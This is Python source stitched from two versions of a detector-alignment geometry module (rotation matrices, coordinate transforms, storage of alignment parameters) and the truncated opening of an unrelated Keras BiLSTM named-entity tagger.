def rotation_matrix_x(angle):
    ''' Rotation matrix around the x axis.

    Note
    ----
    Rotation in a cartesian right-handed coordinate system.

    Parameters
    ----------
    angle : float
        Angle in radians.

    Returns
    -------
    Array with shape (3, 3).
    '''
    c, s = np.cos(angle), np.sin(angle)
    return np.array([[1, 0, 0],
                     [0, c, s],
                     [0, -s, c]])
def rotation_matrix_y(angle):
    ''' Rotation matrix around the y axis.

    Note
    ----
    Rotation in a cartesian right-handed coordinate system.

    Parameters
    ----------
    angle : float
        Angle in radians.

    Returns
    -------
    Array with shape (3, 3).
    '''
    c, s = np.cos(angle), np.sin(angle)
    return np.array([[c, 0, -s],
                     [0, 1, 0],
                     [s, 0, c]])
def rotation_matrix_z(angle):
    ''' Rotation matrix around the z axis.

    Note
    ----
    Rotation in a cartesian right-handed coordinate system.

    Parameters
    ----------
    angle : float
        Angle in radians.

    Returns
    -------
    Array with shape (3, 3).
    '''
    c, s = np.cos(angle), np.sin(angle)
    return np.array([[c, s, 0],
                     [-s, c, 0],
                     [0, 0, 1]])
def rotation_matrix(alpha, beta, gamma):
    ''' Combined rotation matrix around the three cartesian axes x, y, z.

    Note
    ----
    Right-handed system; the rotation is applied around x, then y, then z.
    Remember:
    - Transform to the local coordinate system before applying rotations
    - Rotations are associative but not commutative

    Usage
    -----
    A rotation by (alpha, beta, gamma) of the vector (x, y, z) in the local
    coordinate system can be done by:
    np.dot(rotation_matrix(alpha, beta, gamma), np.array([x, y, z]))

    Parameters
    ----------
    alpha : float
        Angle in radians for rotation around x.
    beta : float
        Angle in radians for rotation around y.
    gamma : float
        Angle in radians for rotation around z.

    Returns
    -------
    Array with shape (3, 3).
    '''
    yz_rotation = np.dot(rotation_matrix_y(beta), rotation_matrix_z(gamma))
    return np.dot(rotation_matrix_x(alpha), yz_rotation)
def translation_matrix(x, y, z):
    ''' Translation matrix for a translation by x, y, z.

    Note
    ----
    Remember: Translations are associative and commutative

    Usage
    -----
    A translation of a vector (x, y, z) by dx, dy, dz can be done by:
    np.dot(translation_matrix(dx, dy, dz), np.array([x, y, z, 1]))

    Parameters
    ----------
    x : float
        Translation in x.
    y : float
        Translation in y.
    z : float
        Translation in z.

    Returns
    -------
    Array with shape (4, 4).
    '''
    # Homogeneous 4x4 matrix with the translation in the last column.
    mat = np.eye(4)
    mat[:3, 3] = [x, y, z]
    return mat
def global_to_local_transformation_matrix(x, y, z, alpha, beta, gamma):
    ''' Transformation matrix that applies a translation and rotation.

    Translation is T=(-x, -y, -z) to the local coordinate system followed
    by a rotation = R(alpha, beta, gamma).T in the local coordinate system.

    Note
    ----
    - This function is the inverse of
      local_to_global_transformation_matrix()
    - The resulting transformation matrix is 4 x 4
    - Translation and Rotation operations are not commutative

    Parameters
    ----------
    x : float
        Translation in x.
    y : float
        Translation in y.
    z : float
        Translation in z.
    alpha : float
        Angle in radians for rotation around x.
    beta : float
        Angle in radians for rotation around y.
    gamma : float
        Angle in radians for rotation around z.

    Returns
    -------
    Array with shape (4, 4).
    '''
    # Inverse rotation (transposed matrix), extended to homogeneous 4x4
    rotation = np.eye(4)
    rotation[:3, :3] = rotation_matrix(alpha, beta, gamma).T
    # Translate into the local system first, then rotate
    translation = translation_matrix(-x, -y, -z)
    return np.dot(rotation, translation)
def local_to_global_transformation_matrix(x, y, z, alpha, beta, gamma):
    ''' Transformation matrix that applies an inverse translation and rotation.

    Rotation in the local coordinate system followed by a translation by
    x, y, z back to the global coordinate system.

    Note
    ----
    - This function is the inverse of
      global_to_local_transformation_matrix()
    - The resulting transformation matrix is 4 x 4
    - Translation and Rotation operations are not commutative

    Parameters
    ----------
    x : float
        Translation in x.
    y : float
        Translation in y.
    z : float
        Translation in z.
    alpha : float
        Angle in radians for rotation around x.
    beta : float
        Angle in radians for rotation around y.
    gamma : float
        Angle in radians for rotation around z.

    Returns
    -------
    Array with shape (4, 4).
    '''
    # Rotation extended to homogeneous 4x4
    rotation = np.eye(4)
    rotation[:3, :3] = rotation_matrix(alpha, beta, gamma)
    # Rotate first, then translate back to the global system
    translation = translation_matrix(x, y, z)
    return np.dot(translation, rotation)
def apply_transformation_matrix(x, y, z, transformation_matrix):
    ''' Applies a homogeneous transformation matrix (4 x 4) to coordinates.

    Parameters
    ----------
    x : array
        Array of x coordinates.
    y : array
        Array of y coordinates.
    z : array
        Array of z coordinates.
    transformation_matrix : array
        Homogeneous transformation matrix with shape (4, 4).

    Returns
    -------
    Arrays with transformed x, y and z coordinates.
    '''
    # Stack into homogeneous coordinates (extra row of ones)
    homogeneous = np.vstack((x, y, z, np.ones_like(x)))
    transformed = np.dot(transformation_matrix, homogeneous).T
    return transformed[:, 0], transformed[:, 1], transformed[:, 2]
def apply_rotation_matrix(x, y, z, rotation_matrix):
    ''' Applies a rotation matrix (3 x 3) to coordinate arrays.

    Parameters
    ----------
    x : array
        Array of x coordinates.
    y : array
        Array of y coordinates.
    z : array
        Array of z coordinates.
    rotation_matrix : array
        Rotation matrix with shape (3, 3).

    Returns
    -------
    Arrays with rotated x, y and z coordinates.
    '''
    stacked = np.vstack((x, y, z))
    rotated = np.dot(rotation_matrix, stacked).T
    return rotated[:, 0], rotated[:, 1], rotated[:, 2]
def apply_alignment(hits_x, hits_y, hits_z, dut_index, alignment=None,
                    prealignment=None, inverse=False):
    ''' Takes hits and applies a transformation according to the alignment data.

    If alignment data with rotations and translations is given, the hits
    are transformed with the full rotation + translation matrices. If
    pre-alignment data with offsets and slopes is given, the hits are
    transformed with the slopes and offsets. Exactly one of alignment and
    prealignment has to be provided. The transformation can be inverted.

    Parameters
    ---------
    hits_x, hits_y, hits_z : array
        Array with corresponding hit positions.
    dut_index : int
        Needed to select the correct alignment info.
    alignment : array
        Alignment information with rotations and translations.
    prealignment : array
        Pre-alignment information with offsets and slopes.
    inverse : bool
        Apply inverse transformation if True.

    Returns
    -------
    hits_x, hits_y, hits_z : array
        Array with transformed hit positions. The input arrays are not
        modified.

    Raises
    ------
    RuntimeError
        If neither or both of alignment and prealignment are given.
    '''
    # Validate the mutually exclusive inputs with accurate messages (the
    # previous version reported 'neither given' also when both were given).
    if alignment is None and prealignment is None:
        raise RuntimeError('Neither pre-alignment or alignment data given.')
    if alignment is not None and prealignment is not None:
        raise RuntimeError('Both pre-alignment and alignment data given; '
                           'only one is allowed.')
    if alignment is not None:
        if inverse:
            logging.debug('Transform hit position into the local coordinate '
                          'system using alignment data')
            transformation_matrix = global_to_local_transformation_matrix(
                x=alignment[dut_index]['translation_x'],
                y=alignment[dut_index]['translation_y'],
                z=alignment[dut_index]['translation_z'],
                alpha=alignment[dut_index]['alpha'],
                beta=alignment[dut_index]['beta'],
                gamma=alignment[dut_index]['gamma'])
        else:
            logging.debug('Transform hit position into the global coordinate '
                          'system using alignment data')
            transformation_matrix = local_to_global_transformation_matrix(
                x=alignment[dut_index]['translation_x'],
                y=alignment[dut_index]['translation_y'],
                z=alignment[dut_index]['translation_z'],
                alpha=alignment[dut_index]['alpha'],
                beta=alignment[dut_index]['beta'],
                gamma=alignment[dut_index]['gamma'])
        hits_x, hits_y, hits_z = apply_transformation_matrix(
            x=hits_x,
            y=hits_y,
            z=hits_z,
            transformation_matrix=transformation_matrix)
    else:
        c0_column = prealignment[dut_index]['column_c0']
        c1_column = prealignment[dut_index]['column_c1']
        c0_row = prealignment[dut_index]['row_c0']
        c1_row = prealignment[dut_index]['row_c1']
        z = prealignment[dut_index]['z']
        if inverse:
            logging.debug('Transform hit position into the local coordinate '
                          'system using pre-alignment data')
            hits_x = (hits_x - c0_column) / c1_column
            hits_y = (hits_y - c0_row) / c1_row
            # Rebind instead of -= so the caller's array is not mutated
            # (x and y already rebind; z used to be modified in place).
            hits_z = hits_z - z
        else:
            logging.debug('Transform hit position into the global coordinate '
                          'system using pre-alignment data')
            hits_x = (c1_column * hits_x + c0_column)
            hits_y = (c1_row * hits_y + c0_row)
            # Rebind instead of += for the same reason as above.
            hits_z = hits_z + z
    return hits_x, hits_y, hits_z
def merge_alignment_parameters(old_alignment, new_alignment, mode='relative',
                               select_duts=None):
    ''' Merges two sets of alignment parameters.

    Parameters
    ----------
    old_alignment, new_alignment : recarray
        Structured arrays with alignment parameters (translations and
        rotations) per DUT.
    mode : string
        'absolute' replaces the old values with the new ones; 'relative'
        adds the new values to the old ones and re-centers the rotations
        and x/y translations around 0 when more than one DUT is selected.
    select_duts : iterable
        Indices of the DUTs to change; all DUTs if None.

    Returns
    -------
    recarray with the merged alignment parameters. The inputs are not
    modified.

    Raises
    ------
    RuntimeError
        If mode is neither 'absolute' nor 'relative'.
    '''
    if select_duts is None:  # Select all DUTs
        # NOTE: plain bool, the np.bool alias was removed in modern NumPy
        dut_sel = np.ones(old_alignment.shape[0], dtype=bool)
    else:
        dut_sel = np.zeros(old_alignment.shape[0], dtype=bool)
        dut_sel[np.array(select_duts)] = True
    # Do not change input parameters
    alig_pars = old_alignment.copy()
    if mode == 'absolute':
        logging.info('Set alignment')
        alig_pars[dut_sel] = new_alignment[dut_sel]
        return alig_pars
    elif mode == 'relative':
        logging.info('Merge new alignment with old alignment')
        for name in ('translation_x', 'translation_y', 'translation_z',
                     'alpha', 'beta', 'gamma'):
            alig_pars[name][dut_sel] += new_alignment[name][dut_sel]
        # TODO: Is this always a good idea? Usually works, but what if one
        # heavily tilted device?
        # All alignments are relative, thus center them around 0 by
        # subtracting the mean (exception: z position)
        if np.count_nonzero(dut_sel) > 1:
            for name in ('alpha', 'beta', 'gamma',
                         'translation_x', 'translation_y'):
                alig_pars[name][dut_sel] -= np.mean(alig_pars[name][dut_sel])
        return alig_pars
    else:
        # %-format the message before raising; passing the format string and
        # argument separately to RuntimeError never interpolates them.
        raise RuntimeError('Unknown mode %s' % str(mode))
def store_alignment_parameters(alignment_file, alignment_parameters,
                               mode='absolute', select_duts=None):
    ''' Stores alignment parameters (rotations, translations) into file.
    Absolute (overwriting) and relative (add angles, translations) supported.

    Parameters
    ---------
    alignment_file : string
        The pytables file name containing the alignment.
    alignment_parameters : recarray
        An array with the alignment values.
    mode : string
        Select relative or absolute alignment. The strings 'relative' and
        'absolute' are supported.
    select_duts : iterable
        In relative mode only change specified DUTs.
    '''
    # Reuse the dtype of the given parameters as the pytables table description.
    description = np.zeros((1,), dtype=alignment_parameters.dtype).dtype
    # Open file with alignment data
    with tb.open_file(alignment_file, mode="r+") as out_file:
        try:
            # No alignment table yet: create it and store the parameters as-is.
            align_tab = out_file.create_table(out_file.root, name='Alignment',
                                              title='Table containing the '
                                                    'alignment geometry parameters '
                                                    '(translations and rotations)',
                                              description=description,
                                              filters=tb.Filters(
                                                  complib='blosc',
                                                  complevel=5,
                                                  fletcher32=False))
            align_tab.append(alignment_parameters)
        except tb.NodeError:
            # Table exists already: merge new parameters with the stored ones
            # (absolute or relative, see merge_alignment_parameters) and
            # replace the node with the merged result.
            align_pars = merge_alignment_parameters(
                old_alignment=out_file.root.Alignment[:],
                new_alignment=alignment_parameters,
                mode=mode,
                select_duts=select_duts)
            logging.info('Overwrite existing alignment!')
            # Remove old node, is there a better way?
            out_file.root.Alignment._f_remove()
            align_tab = out_file.create_table(out_file.root, name='Alignment',
                                              title='Table containing the '
                                                    'alignment geometry parameters '
                                                    '(translations and rotations)',
                                              description=description,
                                              filters=tb.Filters(
                                                  complib='blosc',
                                                  complevel=5,
                                                  fletcher32=False))
            align_tab.append(align_pars)
            # Log the resulting alignment per DUT for traceability.
            string = "\n".join(['DUT%d: alpha=%1.4f, beta=%1.4f, gamma=%1.4f Rad, '
                                'x/y/z=%d/%d/%d um' % (dut_values['DUT'],
                                                       dut_values['alpha'],
                                                       dut_values['beta'],
                                                       dut_values['gamma'],
                                                       dut_values['translation_x'],
                                                       dut_values['translation_y'],
                                                       dut_values['translation_z'])
                                for dut_values in align_pars])
            logging.info('Set alignment parameters to:\n%s' % string)
MAINT: cleanup
''' Helper functions for geometrical operations.
'''
from __future__ import division
import logging
import tables as tb
import numpy as np
def get_plane_normal(direction_vector_1, direction_vector_2):
    ''' Normal vector of the plane spanned by two direction vectors.

    The plane is defined by two non-parallel direction vectors lying
    within it; the normal is their cross product.

    Parameters
    ----------
    direction_vector_1 : array
        Array with x, y and z.
    direction_vector_2 : array
        Array with x, y and z.

    Returns
    -------
    Array with x, y and z.
    '''
    plane_normal = np.cross(direction_vector_1, direction_vector_2)
    return plane_normal
def get_line_intersections_with_plane(line_origins, line_directions,
                                      position_plane, normal_plane):
    ''' Calculates the intersection of n lines with one plane.

    If a line has no intersection point (it is parallel to the plane or
    lies within it) its intersection is set to nan.

    Notes
    -----
    Further information:
    http://stackoverflow.com/questions/4938332/line-plane-intersection-based-on-points

    Parameters
    ----------
    line_origins : array
        A point (x, y and z) on the line for each of the n lines.
    line_directions : array
        The direction vector of the line for n lines.
    position_plane : array
        A array (x, y and z) to the plane.
    normal_plane : array
        The normal vector (x, y and z) of the plane.

    Returns
    -------
    Array with shape (n, 3) with the intersection point.
    '''
    # Vector from each line origin to the plane reference point
    offsets_to_plane = position_plane[np.newaxis, :] - line_origins
    numerator = np.dot(normal_plane, offsets_to_plane.T)
    # atleast_1d keeps the special case n = 1 working
    denominator = np.atleast_1d(np.dot(normal_plane, line_directions.T))
    # nan marks lines without a unique intersection
    line_scale = np.full_like(numerator, fill_value=np.nan)
    if np.any(denominator == 0):
        logging.warning('Some line plane intersection could not be calculated')
    # Avoid division by zero for parallel / in-plane lines
    has_solution = denominator != 0
    line_scale[has_solution] = numerator[has_solution] / denominator[has_solution]
    return line_origins + line_directions * line_scale[:, np.newaxis]
def cartesian_to_spherical(x, y, z):
    ''' Transformation from cartesian to spherical coordinates.

    Convention: r = 0 --> phi = theta = 0, and phi = 0 for x = 0.

    Parameters
    ----------
    x, y, z : array
        Position in cartesian space.

    Returns
    -------
    Spherical coordinates phi, theta and r.
    '''
    r = np.sqrt(x * x + y * y + z * z)
    phi = np.zeros_like(r)    # convention: phi = 0 for x = 0
    theta = np.zeros_like(r)  # convention: theta = 0 for r = 0
    # Guard against division by zero, see
    # https://en.wikipedia.org/wiki/Atan2
    x_nonzero = x != 0
    phi[x_nonzero] = np.arctan2(y[x_nonzero], x[x_nonzero])
    phi[phi < 0] += 2. * np.pi  # map to phi = [0 .. 2 pi[
    r_nonzero = r != 0
    theta[r_nonzero] = np.arccos(z[r_nonzero] / r[r_nonzero])
    return phi, theta, r
def spherical_to_cartesian(phi, theta, r):
    ''' Transformation from spherical to cartesian coordinates.

    Validates the input ranges before converting.

    Parameters
    ----------
    phi, theta, r : array
        Position in spherical space.

    Returns
    -------
    Cartesian coordinates x, y and z.

    Raises
    ------
    RuntimeError
        If r, theta or phi are outside their valid ranges.
    '''
    if np.any(r < 0):
        raise RuntimeError('Conversion from spherical to cartesian coordinates failed, because r < 0')
    if np.any(theta < 0) or np.any(theta >= np.pi):
        raise RuntimeError('Conversion from spherical to cartesian coordinates failed, because theta exceeds [0, Pi[')
    if np.any(phi < 0) or np.any(phi >= 2 * np.pi):
        raise RuntimeError('Conversion from spherical to cartesian coordinates failed, because phi exceeds [0, 2*Pi[')
    theta_sin = np.sin(theta)
    return (r * np.cos(phi) * theta_sin,
            r * np.sin(phi) * theta_sin,
            r * np.cos(theta))
def rotation_matrix_x(angle):
    ''' Rotation matrix around the x axis.

    Note
    ----
    Rotation in a cartesian right-handed coordinate system.

    Parameters
    ----------
    angle : float
        Angle in radians.

    Returns
    -------
    Array with shape (3, 3).
    '''
    cos_a, sin_a = np.cos(angle), np.sin(angle)
    return np.array([[1, 0, 0],
                     [0, cos_a, sin_a],
                     [0, -sin_a, cos_a]])
def rotation_matrix_y(angle):
    ''' Rotation matrix around the y axis.

    Note
    ----
    Rotation in a cartesian right-handed coordinate system.

    Parameters
    ----------
    angle : float
        Angle in radians.

    Returns
    -------
    Array with shape (3, 3).
    '''
    cos_a, sin_a = np.cos(angle), np.sin(angle)
    return np.array([[cos_a, 0, -sin_a],
                     [0, 1, 0],
                     [sin_a, 0, cos_a]])
def rotation_matrix_z(angle):
    ''' Rotation matrix around the z axis.

    Note
    ----
    Rotation in a cartesian right-handed coordinate system.

    Parameters
    ----------
    angle : float
        Angle in radians.

    Returns
    -------
    Array with shape (3, 3).
    '''
    cos_a, sin_a = np.cos(angle), np.sin(angle)
    return np.array([[cos_a, sin_a, 0],
                     [-sin_a, cos_a, 0],
                     [0, 0, 1]])
def rotation_matrix(alpha, beta, gamma):
    ''' Combined rotation matrix around the three cartesian axes x, y, z.

    Note
    ----
    Right-handed system; the rotation is applied around x, then y, then z.
    Remember:
    - Transform to the local coordinate system before applying rotations
    - Rotations are associative but not commutative

    Usage
    -----
    A rotation by (alpha, beta, gamma) of the vector (x, y, z) in the local
    coordinate system can be done by:
    np.dot(rotation_matrix(alpha, beta, gamma), np.array([x, y, z]))

    Parameters
    ----------
    alpha : float
        Angle in radians for rotation around x.
    beta : float
        Angle in radians for rotation around y.
    gamma : float
        Angle in radians for rotation around z.

    Returns
    -------
    Array with shape (3, 3).
    '''
    rotation_yz = np.dot(rotation_matrix_y(beta), rotation_matrix_z(gamma))
    return np.dot(rotation_matrix_x(alpha), rotation_yz)
def translation_matrix(x, y, z):
    ''' Calculates the translation matrix for the translation in x, y, z in a
    cartesian right-handed system.

    Note
    ----
    Remember: Translations are associative and commutative

    Usage
    -----
    A translation of a vector (x, y, z) by dx, dy, dz can be done by:
        np.dot(translation_matrix(dx, dy, dz), np.array([x, y, z, 1]))

    Parameters
    ----------
    x : float
        Translation in x.
    y : float
        Translation in y.
    z : float
        Translation in z.

    Returns
    -------
    Array with shape (4, 4).
    '''
    # Build the homogeneous translation matrix directly by writing the offsets
    # into the last column.  The previous implementation wrote them into the
    # last row and transposed, and its local variable shadowed this function's
    # own name.
    T = np.eye(4)
    T[:3, 3] = (x, y, z)
    return T
def global_to_local_transformation_matrix(x, y, z, alpha, beta, gamma):
    ''' Transformation matrix that applies a translation and rotation.

    Translation is T=(-x, -y, -z) to the local coordinate system followed
    by a rotation = R(alpha, beta, gamma).T in the local coordinate system.

    Note
    ----
    - This function is the inverse of local_to_global_transformation_matrix()
    - The resulting transformation matrix is 4 x 4
    - Translation and Rotation operations are not commutative

    Parameters
    ----------
    x : float
        Translation in x.
    y : float
        Translation in y.
    z : float
        Translation in z.
    alpha : float
        Angle in radians for rotation around x.
    beta : float
        Angle in radians for rotation around y.
    gamma : float
        Angle in radians for rotation around z.

    Returns
    -------
    Array with shape (4, 4).
    '''
    # Embed the transposed (= inverted) 3x3 rotation into a 4x4 matrix
    rotation = np.eye(4, 4, 0)
    rotation[:3, :3] = rotation_matrix(alpha, beta, gamma).T
    # Translate into the local system first, then rotate
    translation = translation_matrix(-x, -y, -z)
    return np.dot(rotation, translation)
def local_to_global_transformation_matrix(x, y, z, alpha, beta, gamma):
    ''' Transformation matrix that applies an inverse translation and rotation.

    Inverse rotation in the local coordinate system followed by an inverse
    translation by x, y, z to the global coordinate system.

    Note
    ----
    - The resulting transformation matrix is 4 x 4
    - Translation and Rotation operations are not commutative

    Parameters
    ----------
    x : float
        Translation in x.
    y : float
        Translation in y.
    z : float
        Translation in z.
    alpha : float
        Angle in radians for rotation around x.
    beta : float
        Angle in radians for rotation around y.
    gamma : float
        Angle in radians for rotation around z.

    Returns
    -------
    Array with shape (4, 4).
    '''
    # Embed the 3x3 rotation into a 4x4 matrix
    rotation = np.eye(4, 4, 0)
    rotation[:3, :3] = rotation_matrix(alpha, beta, gamma)
    # Rotate first, then translate back to the global system
    translation = translation_matrix(x, y, z)
    return np.dot(translation, rotation)
def apply_transformation_matrix(x, y, z, transformation_matrix):
    ''' Takes arrays for x, y, z and applies a transformation matrix (4 x 4).

    Parameters
    ----------
    x : array
        Array of x coordinates.
    y : array
        Array of y coordinates.
    z : array
        Array of z coordinates.
    transformation_matrix : array
        Homogeneous 4 x 4 transformation matrix.

    Returns
    -------
    Array with transformed coordinates.
    '''
    # Stack into homogeneous coordinates: shape (4, n)
    homogeneous = np.vstack((x, y, z, np.ones_like(x)))
    # Apply the matrix and drop the homogeneous coordinate again
    transformed = np.dot(transformation_matrix, homogeneous)[:3].T
    return transformed[:, 0], transformed[:, 1], transformed[:, 2]
def apply_rotation_matrix(x, y, z, rotation_matrix):
    ''' Takes arrays in x, y, z and applies a rotation matrix (3 x 3).

    Parameters
    ----------
    x : array
        Array of x coordinates.
    y : array
        Array of y coordinates.
    z : array
        Array of z coordinates.
    rotation_matrix : array
        Rotation matrix with shape (3, 3).

    Returns
    -------
    Array with rotated coordinates.
    '''
    # Shape (3, n): one column per point
    stacked = np.vstack((x, y, z))
    rotated = np.dot(rotation_matrix, stacked).T
    return rotated[:, 0], rotated[:, 1], rotated[:, 2]
def apply_alignment(hits_x, hits_y, hits_z, dut_index, alignment=None,
                    prealignment=None, inverse=False):
    ''' Takes hits and applies a transformation according to the alignment data.

    If alignment data with rotations and translations are given the hits are
    transformed according to the rotations and translations.
    If pre-alignment data with offsets and slopes are given the hits are
    transformed according to the slopes and offsets.
    Exactly one of alignment and prealignment has to be given.
    The transformation can be inverted.

    Parameters
    ----------
    hits_x, hits_y, hits_z : array
        Array with corresponding hit positions.
        NOTE: in the pre-alignment branch hits_z is changed with in-place
        operators, so an ndarray argument is modified in place.
    dut_index : int
        Needed to select the correct alignment info.
    alignment : array
        Alignment information with rotations and translations.
    prealignment : array
        Pre-alignment information with offsets and slopes.
    inverse : bool
        Apply inverse transformation if True.

    Returns
    -------
    hits_x, hits_y, hits_z : array
        Array with transformed hit positions.

    Raises
    ------
    RuntimeError
        If not exactly one of alignment and prealignment is given.
    '''
    # The check fires when none OR both data sets are given; the old error
    # message only described the "none given" case.
    if (alignment is None) == (prealignment is None):
        raise RuntimeError('Exactly one of alignment and pre-alignment data '
                           'has to be given.')

    if alignment is not None:
        if inverse:
            logging.debug('Transform hit position into the local coordinate '
                          'system using alignment data')
            transformation_matrix = global_to_local_transformation_matrix(
                x=alignment[dut_index]['translation_x'],
                y=alignment[dut_index]['translation_y'],
                z=alignment[dut_index]['translation_z'],
                alpha=alignment[dut_index]['alpha'],
                beta=alignment[dut_index]['beta'],
                gamma=alignment[dut_index]['gamma'])
        else:
            logging.debug('Transform hit position into the global coordinate '
                          'system using alignment data')
            transformation_matrix = local_to_global_transformation_matrix(
                x=alignment[dut_index]['translation_x'],
                y=alignment[dut_index]['translation_y'],
                z=alignment[dut_index]['translation_z'],
                alpha=alignment[dut_index]['alpha'],
                beta=alignment[dut_index]['beta'],
                gamma=alignment[dut_index]['gamma'])

        hits_x, hits_y, hits_z = apply_transformation_matrix(
            x=hits_x,
            y=hits_y,
            z=hits_z,
            transformation_matrix=transformation_matrix)
    else:
        c0_column = prealignment[dut_index]['column_c0']
        c1_column = prealignment[dut_index]['column_c1']
        c0_row = prealignment[dut_index]['row_c0']
        c1_row = prealignment[dut_index]['row_c1']
        z = prealignment[dut_index]['z']

        if inverse:
            logging.debug('Transform hit position into the local coordinate '
                          'system using pre-alignment data')
            # Invert the linear column/row correction
            hits_x = (hits_x - c0_column) / c1_column
            hits_y = (hits_y - c0_row) / c1_row
            hits_z -= z
        else:
            logging.debug('Transform hit position into the global coordinate '
                          'system using pre-alignment data')
            hits_x = (c1_column * hits_x + c0_column)
            hits_y = (c1_row * hits_y + c0_row)
            hits_z += z

    return hits_x, hits_y, hits_z
def merge_alignment_parameters(old_alignment, new_alignment, mode='relative',
                               select_duts=None):
    ''' Merges new alignment parameters into existing ones.

    Parameters
    ----------
    old_alignment, new_alignment : recarray
        Alignment arrays with translation_x/y/z and alpha/beta/gamma fields.
    mode : string
        'absolute' overwrites the old values with the new ones; 'relative'
        adds the new values to the old ones and centers the result around
        zero (exception: translation_z).
    select_duts : iterable
        Indices of the DUTs to change; all DUTs if None.

    Returns
    -------
    recarray with the merged alignment parameters (the inputs are not
    modified).

    Raises
    ------
    RuntimeError
        If mode is neither 'absolute' nor 'relative'.
    '''
    if select_duts is None:  # Select all DUTs
        # np.bool was removed in numpy >= 1.24; the builtin bool is correct
        dut_sel = np.ones(old_alignment.shape[0], dtype=bool)
    else:
        dut_sel = np.zeros(old_alignment.shape[0], dtype=bool)
        dut_sel[np.array(select_duts)] = True

    # Do not change input parameters
    alig_pars = old_alignment.copy()

    if mode == 'absolute':
        logging.info('Set alignment')
        alig_pars[dut_sel] = new_alignment[dut_sel]
        return alig_pars
    elif mode == 'relative':
        logging.info('Merge new alignment with old alignment')
        for name in ('translation_x', 'translation_y', 'translation_z',
                     'alpha', 'beta', 'gamma'):
            alig_pars[name][dut_sel] += new_alignment[name][dut_sel]
        # TODO: Is this always a good idea? Usually works, but what if one
        # heavily tilted device?
        # All alignments are relative, thus center them around 0 by
        # subtracting the mean (exception: z position)
        if np.count_nonzero(dut_sel) > 1:
            for name in ('alpha', 'beta', 'gamma',
                         'translation_x', 'translation_y'):
                alig_pars[name][dut_sel] -= np.mean(alig_pars[name][dut_sel])
        return alig_pars
    else:
        # The old code passed (msg, arg) to RuntimeError without formatting
        raise RuntimeError('Unknown mode %s' % str(mode))
def _write_alignment_table(out_file, description, data):
    ''' Creates the Alignment table in out_file and appends data to it. '''
    align_tab = out_file.create_table(out_file.root, name='Alignment',
                                      title='Table containing the '
                                            'alignment geometry parameters '
                                            '(translations and rotations)',
                                      description=description,
                                      filters=tb.Filters(
                                          complib='blosc',
                                          complevel=5,
                                          fletcher32=False))
    align_tab.append(data)


def store_alignment_parameters(alignment_file, alignment_parameters,
                               mode='absolute', select_duts=None):
    ''' Stores alignment parameters (rotations, translations) into file.

    Absolute (overwriting) and relative (add angles, translations) supported.

    Parameters
    ----------
    alignment_file : string
        The pytables file name containing the alignment.
    alignment_parameters : recarray
        An array with the alignment values.
    mode : string
        Select relative or absolute alignment. The strings 'relative' and
        'absolute' are supported.
    select_duts : iterable
        In relative mode only change specified DUTs.
    '''
    description = np.zeros((1,), dtype=alignment_parameters.dtype).dtype
    # Open file with alignment data
    with tb.open_file(alignment_file, mode="r+") as out_file:
        try:
            _write_alignment_table(out_file, description,
                                   alignment_parameters)
            # Bug fix: align_pars was undefined in this path before and the
            # log summary below raised a NameError on the very first store
            align_pars = alignment_parameters
        except tb.NodeError:  # Alignment table exists already
            align_pars = merge_alignment_parameters(
                old_alignment=out_file.root.Alignment[:],
                new_alignment=alignment_parameters,
                mode=mode,
                select_duts=select_duts)
            logging.info('Overwrite existing alignment!')
            # Remove old node, is there a better way?
            out_file.root.Alignment._f_remove()
            _write_alignment_table(out_file, description, align_pars)

        string = "\n".join(['DUT%d: alpha=%1.4f, beta=%1.4f, gamma=%1.4f Rad, '
                            'x/y/z=%d/%d/%d um' % (dut_values['DUT'],
                                                   dut_values['alpha'],
                                                   dut_values['beta'],
                                                   dut_values['gamma'],
                                                   dut_values['translation_x'],
                                                   dut_values['translation_y'],
                                                   dut_values['translation_z'])
                            for dut_values in align_pars])
        logging.info('Set alignment parameters to:\n%s' % string)
|
# -*- coding: utf-8 -*-
"""
taggerTrainingKeras.py
train Deep Named entities tagger
H. Déjean
copyright Naverlabs 2017
READ project
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Developed for the EU project READ. The READ project has received funding
from the European Union's Horizon 2020 research and innovation programme
under grant agreement No 674943.
"""
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import absolute_import
import sys,os
from io import open
from optparse import OptionParser
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(sys.argv[0]))))
from sklearn.pipeline import Pipeline, FeatureUnion
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.base import BaseEstimator, TransformerMixin
os.environ['KERAS_BACKEND'] = 'tensorflow'
from keras.models import Sequential, load_model, Model
from keras.layers import Bidirectional, Dropout, Input
from keras.layers.wrappers import TimeDistributed
from keras.layers.recurrent import LSTM
from keras.layers.core import Dense, Masking
from keras.regularizers import L1L2
import numpy as np
import pickle
import gzip
from contentProcessing.attentiondecoder import AttentionDecoder
class Transformer(BaseEstimator, TransformerMixin):
    ''' Base class for the feature transformers of this module.

    Implements the sklearn transformer protocol: fit is a no-op and
    transform has to be provided by the subclass.
    '''
    def __init__(self):
        BaseEstimator.__init__(self)
        TransformerMixin.__init__(self)

    def fit(self, l, y=None):
        # Nothing to learn; return self so the object chains in a Pipeline
        return self

    def transform(self, l):
        # The previous `assert False` is stripped under `python -O`, which
        # would make a non-overriding subclass silently return None.
        raise NotImplementedError("Specialize this method!")
class SparseToDense(Transformer):
    ''' Transformer that converts a sparse matrix to a dense numpy array. '''
    def __init__(self):
        Transformer.__init__(self)
    def transform(self, o):
        # o is expected to provide .toarray(), e.g. the scipy sparse matrix
        # produced by CountVectorizer -- TODO confirm against the pipeline
        return o.toarray()
class NodeTransformerTextEnclosed(Transformer):
    """
    we will get a list of block and need to send back what a textual feature
    extractor (TfidfVectorizer) needs.
    So we return a list of strings
    """
    def transform(self, lw):
        # The old identity `map(lambda x: x, lw)` returned a single-use
        # iterator although the docstring promises a list of strings;
        # materialize so the result can be iterated more than once.
        return list(lw)
class DeepTagger():
    ''' BiLSTM named-entity tagger based on Keras, with an optional
    multi-task ("multitype") variant that predicts BIES segmentation and
    label in two output layers. Supports training, testing and prediction.
    '''
    # Component metadata
    usage = ""
    version = "v.01"
    description = "description: keras/bilstm ner"
    def __init__(self):
        """ Initialize all hyper-parameters and mode flags with defaults;
        setParams() overrides them from the command line. """
